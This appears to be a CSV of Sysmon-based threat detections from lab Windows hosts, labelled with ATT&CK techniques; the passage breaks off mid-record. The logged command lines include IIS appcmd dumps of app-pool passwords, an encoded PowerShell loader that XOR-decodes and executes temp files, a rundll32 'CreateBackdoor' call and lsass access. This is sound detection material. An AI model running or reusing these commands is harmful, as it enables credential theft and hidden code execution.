+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 2164892
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ LAPTOP-JU4M3I0E
+
+
+
+
+
+ 2020-10-05 20:43:58.450
+ 00247C92-858E-5F7B-0000-0010E741202B
+ 6636
+ C:\Windows\System32\cmd.exe
+ 10.0.18362.449 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd.exe
+ C:\windows\
+ LAPTOP-JU4M3I0E\bouss
+ 00247C92-8C36-5F75-0000-002034E39103
+ 0x391e334
+ 2
+ High
+ SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 00247C92-858E-5F7B-0000-00105241202B
+ 18404
+ C:\Windows\System32\Taskmgr.exe
+ C:\windows\system32\taskmgr.exe
+
+",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1556808617.955524,2019-05-02T18:50:17.955524+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.36.133 ) and port ( 443 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 10272
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-02 14:48:51.664
+ 365ABB72-0244-5CCB-0000-00109AE70B00
+ 1508
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ IEWIN7\IEUser
+ tcp
+ true
+ false
+ 10.0.2.15
+ IEWIN7.home
+ 49178
+
+ false
+ 151.101.36.133
+
+ 443
+ https
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 339891
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-08-02 16:24:28.637
+ 747F3D96-E8BC-5F26-0000-0010F7C41A00
+ 588
+ C:\Windows\System32\whoami.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ whoami.exe
+ whoami
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-E308-5F26-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
+ 747F3D96-E8BA-5F26-0000-001035BE1A00
+ 8104
+ C:\Windows\System32\cmd.exe
+ "c:\windows\system32\cmd.exe"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1619129375.284604,2021-04-23T02:09:35.284604+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 564605
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2021-04-22 22:09:35.263
+ 747F3D96-F41F-6081-0000-001078834A00
+ 6644
+ C:\Windows\System32\svchost.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Host Process for Windows Services
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ svchost.exe
+ C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
+ C:\Windows\system32\
+ NT AUTHORITY\LOCAL SERVICE
+ 747F3D96-6E1A-6082-0000-0020E5030000
+ 0x3e5
+ 0
+ System
+ SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69
+ 00000000-0000-0000-0000-000000000000
+ 624
+ ?
+ ?
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1596385468.64099,2020-08-02T20:24:28.640990+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 339890
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-08-02 16:24:26.803
+ 747F3D96-E8BA-5F26-0000-001035BE1A00
+ 8104
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ "c:\windows\system32\cmd.exe"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-E308-5F26-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-E309-5F26-0000-0010137B0000
+ 820
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k DcomLaunch -p
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1003 ] Credential Dumping ImageLoad,1555606895.720774,2019-04-18T21:01:35.720774+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"
+
+
+
+
+ 7
+ 3
+ 4
+ 7
+ 0
+ 0x8000000000000000
+
+
+ 29
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1003,technique_name=Credential Dumping
+ 2019-04-18 17:01:35.680
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ C:\Windows\System32\vaultcli.dll
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Credential Vault Client Library
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56
+ true
+ Microsoft Windows
+ Valid
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606895.720774,2019-04-18T21:01:35.720774+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"
+
+
+
+
+ 7
+ 3
+ 4
+ 7
+ 0
+ 0x8000000000000000
+
+
+ 29
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1003,technique_name=Credential Dumping
+ 2019-04-18 17:01:35.680
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ C:\Windows\System32\vaultcli.dll
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Credential Vault Client Library
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56
+ true
+ Microsoft Windows
+ Valid
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.731362,2019-05-27T05:29:17.731362+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.password ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5898
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:17.691
+ 365ABB72-3D6D-5CEB-0000-00104474FF00
+ 2448
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.password
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1003.001] Credential dump Thread Open to Lsass,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,Process ( \\VBOXSVR\HTools\voice_mail.msg.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8,"
+
+
+
+
+ 8
+ 2
+ 4
+ 8
+ 0
+ 0x8000000000000000
+
+
+ 9066
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 12:43:43.784
+ 365ABB72-4055-5CC8-0000-0010769D0B00
+ 1532
+ \\VBOXSVR\HTools\voice_mail.msg.exe
+ 365ABB72-3FE0-5CC8-0000-00107E590000
+ 492
+ C:\Windows\System32\lsass.exe
+ 3656
+ 0x001A0000
+
+
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243552
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.397
+ 747F3D96-9F69-5E75-0000-001033922000
+ 6572
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243552
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.397
+ 747F3D96-9F69-5E75-0000-001033922000
+ 6572
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.661261,2019-05-27T05:29:17.661261+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.username ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5895
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:17.621
+ 365ABB72-3D6D-5CEB-0000-00108270FF00
+ 1340
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.username
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243552
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.397
+ 747F3D96-9F69-5E75-0000-001033922000
+ 6572
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1003 ] Credential Dumping ImageLoad,1555606894.689291,2019-04-18T21:01:34.689291+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"
+
+
+
+
+ 7
+ 3
+ 4
+ 7
+ 0
+ 0x8000000000000000
+
+
+ 27
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1003,technique_name=Credential Dumping
+ 2019-04-18 17:01:34.629
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ C:\Windows\System32\hid.dll
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Hid User Library
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE
+ true
+ Microsoft Windows
+ Valid
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.689291,2019-04-18T21:01:34.689291+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"
+
+
+
+
+ 7
+ 3
+ 4
+ 7
+ 0
+ 0x8000000000000000
+
+
+ 27
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+ technique_id=T1003,technique_name=Credential Dumping
+ 2019-04-18 17:01:34.629
+ 365ABB72-AC28-5CB8-0000-0010F3F70700
+ 1200
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ C:\Windows\System32\hid.dll
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Hid User Library
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE
+ true
+ Microsoft Windows
+ Valid
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.581146,2019-05-27T05:29:17.581146+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5892
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
